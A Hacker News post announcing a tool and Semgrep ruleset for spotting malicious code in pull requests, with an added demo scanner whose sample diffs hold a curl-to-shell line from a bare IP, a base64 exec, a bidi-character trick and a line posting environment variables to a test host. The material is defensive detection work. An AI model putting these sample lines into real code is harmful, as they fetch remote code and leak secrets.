Show HN: I built a PR listener and ruleset to detect malicious code in CI/CD (github.com/apiiro)
13 points by mgiladi 2 days ago | 1 comment
I built a GitHub app that detects malicious code in pull requests and notifies on or blocks them. Alongside it, I published a Semgrep ruleset for any stage of the CI/CD pipeline.

I started this after getting frustrated by all the FUD around malicious code - lots of noise, little effort to solve it. Having said that, it's still a major attack vector - a stored RCE, with the codebase itself as the sink.

Feedback is appreciated.

The app, PRevent - https://github.com/apiiro/PRevent

The ruleset: https://github.com/apiiro/malicious-code-ruleset

The research: https://apiiro.com/blog/guard-your-codebase-practical-steps-...
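
As an added example (this is not PRevent's code and not the apiiro ruleset, which is written as Semgrep rules), the script below shows the shape of the check such a PR listener performs: walk the added lines of a pull request's unified diff, match them against a handful of malicious-code indicators, and turn the findings into a notify-or-block decision. The sample diffs, the indicator patterns, the base64 payload and the severity policy are all constructed for this illustration; assume a real ruleset is far broader and language-aware.

```python
"""Toy PR gate: scan the added lines of a unified diff for malicious-code
indicators and decide whether to pass, notify, or block.

Added example only. Not PRevent's code; the rules below are not the apiiro
Semgrep ruleset. Diffs, patterns and policy are constructed for the demo.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    line_no: int      # line number in the new (post-PR) file
    rule: str
    severity: str     # "high" -> block, "medium" -> notify
    text: str


# Constructed, deliberately narrow indicator rules (assumption: a real
# ruleset is much richer, language-aware and AST-based rather than regex).
RULES = [
    ("exec-of-decoded-payload", "high",
     re.compile(r"\b(?:eval|exec)\s*\(\s*(?:base64\.)?b64decode\s*\(")),
    ("pipe-download-to-shell", "high",
     re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b")),
    ("env-sent-over-network", "medium",   # os.environ and a sender on one line
     re.compile(r"(?=.*\bos\.environ\b)(?=.*\b(?:requests\.post|urlopen|socket\.socket)\b)")),
]

# Trojan Source style characters: bidi controls and zero-width code points.
INVISIBLE = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
             "\u2066", "\u2067", "\u2068", "\u2069",
             "\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}


def added_lines(diff_text):
    """Yield (path, new_line_number, content) for every '+' line of a diff.

    Minimal unified-diff walker: file headers, 'diff'/'index' lines and
    '\\ No newline' markers are skipped; removed lines do not advance the
    new-file counter. (An added line whose content starts with '++ ' would
    be mistaken for a header; acceptable for a demo.)
    """
    path, new_no = None, 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            name = raw[4:].strip()
            path = name[2:] if name.startswith("b/") else name
        elif raw.startswith(("--- ", "diff ", "index ", "\\")):
            continue
        elif raw.startswith("@@"):
            m = re.match(r"@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@", raw)
            new_no = int(m.group(1)) if m else 0
        elif raw.startswith("+"):
            yield path, new_no, raw[1:]
            new_no += 1
        elif raw.startswith("-"):
            continue
        else:
            new_no += 1  # context line


def scan_diff(diff_text):
    """Run every rule plus the invisible-character check over added lines."""
    findings = []
    for path, no, line in added_lines(diff_text):
        for name, sev, rx in RULES:
            if rx.search(line):
                findings.append(Finding(path, no, name, sev, line.strip()))
        bad = sorted({f"U+{ord(c):04X}" for c in line if c in INVISIBLE})
        if bad:
            findings.append(Finding(path, no, "invisible-or-bidi-char:" + ",".join(bad),
                                    "high", line.strip()))
    return findings


def decide(findings):
    """Constructed policy: any high finding blocks; medium only notifies."""
    if any(f.severity == "high" for f in findings):
        return "block"
    return "notify" if findings else "pass"


# Constructed sample diffs. "aW1wb3J0IG9z" is just base64 of "import os".
SAMPLE_DIFF = """\
diff --git a/setup.py b/setup.py
--- a/setup.py
+++ b/setup.py
@@ -1,2 +1,5 @@
 from setuptools import setup
+import base64, os
+# harmless-looking helper
+exec(base64.b64decode("aW1wb3J0IG9z"))
 setup(name="demo", version="0.1")
diff --git a/build.sh b/build.sh
--- a/build.sh
+++ b/build.sh
@@ -3,2 +3,3 @@
 set -e
+curl -s http://198.51.100.7/x.sh | sh
 make
diff --git a/src/auth.js b/src/auth.js
--- a/src/auth.js
+++ b/src/auth.js
@@ -10,2 +10,3 @@
 function isAdmin(level) {
+  if (level != "user\u202e \u2066// check if admin\u2069 \u2066") {
   return level === "admin";
"""
NOTIFY_DIFF = ("--- a/app.py\n+++ b/app.py\n@@ -1 +1,2 @@\n import os\n"
               "+requests.post('https://example.test/c', data=dict(os.environ))\n")
CLEAN_DIFF = "--- a/README.md\n+++ b/README.md\n@@ -1 +1,2 @@\n # demo\n+Run `make` to build.\n"

if __name__ == "__main__":
    for label, diff in [("sample", SAMPLE_DIFF), ("notify", NOTIFY_DIFF), ("clean", CLEAN_DIFF)]:
        fs = scan_diff(diff)
        for f in fs:
            print(f"{f.path}:{f.line_no} [{f.severity}] {f.rule}: {f.text}")
        print(f"{label}: decision = {decide(fs)}")
```

The bidi check matters because a diff viewer renders the auth.js line as a harmless comparison while the parser sees the override characters; a PR gate that only looks at rendered text misses it. In a real listener the decision would map to a GitHub check run or review comment, and the rule set would come from Semgrep rather than from inline regexes.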

> getting frustrated by all the FUD around malicious code - lots of noise, little effort to solve it

You should be worried about your logs too :) Dare you to `sudo cat logs.txt`

https://www.youtube.com/watch?v=3T2Al3jdY38
